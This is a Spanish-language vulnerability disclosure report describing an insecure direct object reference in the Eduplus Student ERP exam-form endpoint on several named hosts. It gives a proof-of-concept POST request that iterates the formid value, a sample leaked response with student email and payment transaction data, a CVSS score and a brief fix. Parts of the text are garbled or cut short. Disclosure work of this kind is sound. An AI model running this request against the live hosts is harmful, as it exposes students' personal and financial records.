
Informe detallado de investigación de vulnerabilidades sobre un IDOR en Eduplus Student ERP, que incluye análisis técnico, PoC, evaluación de impacto y recomendaciones de remediación.
Investigador: Vinay Sharma
Este informe detalla una vulnerabilidad de seguridad de alta severidad identificada en la plataforma Eduplus Student ERP, específicamente dentro del portal del estudiante (learnerapi.pceterp.in). La aplicación sufre una Referencia Directa a Objetos Insegura (IDOR) Universal en el endpoint de envío del formulario de examen, lo que permite a cualquier usuario autenticado (estudiante) recuperar los datos personales y financieros sensibles de cualquier otro estudiante manipulando los identificadores del formulario.
La vulnerabilidad permite la recolección de datos a gran escala de registros de estudiantes, incluida Información de Identificación Personal (PII) y rastros de auditoría detallados de transacciones financieras.
learnerapi.pceterp.in, learner.zealerp.in, , etc.learner.despu.edu.inPOST /ExamForm/viewSubmitExamFormCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)La vulnerabilidad reside en el endpoint viewSubmitExamForm. El servidor depende de dos parámetros proporcionados por el cliente para identificar el registro a recuperar:
{"formid": "XXXXX"}Router-Path: /view-pcu-exam-form/XXXXXformid solicitado. Al iterar a través de IDs numéricos, un atacante puede acceder a los registros de otros estudiantes.Una solicitud POST estándar al endpoint vulnerable con un formid modificado produce datos sensibles del estudiante.
Solicitud:
POST /ExamForm/viewSubmitExamForm HTTP/2
Host: learnerapi.pceterp.in
Content-Type: application/json
Router-Path: /view-pcu-exam-form/28984
... (Cabeceras Autenticadas) ...
{"formid":"28984"}
Respuesta (Resumen de Datos Filtrados):
{
"status": "200",
"examFormname": "B.Tech - Sem VI - Regular",
"receipt_no": "REC/2023/54321",
"feespaiddate": "2023-10-15",
"ispaymentdone": {
"username": "[email protected]",
"received_amount": "1500.0",
"updation_ip_address": "103.x.x.x",
"erp_transaction_id": "ERP_998877",
"bank_transaction_id": "BANK_ABC123",
"paymentgateway_transaction_id": "PG_XYZ789",
"learner": {
"id": "12345"
}
}
}





Subiendo Idorpoc.mp4…
La explotación exitosa de esta vulnerabilidad permite:
formid solicitado pertenezca al learnerid asociado con la sesión activa. Nunca confíe en los parámetros formid o Router-Path sin validación contra el token de sesión autenticado.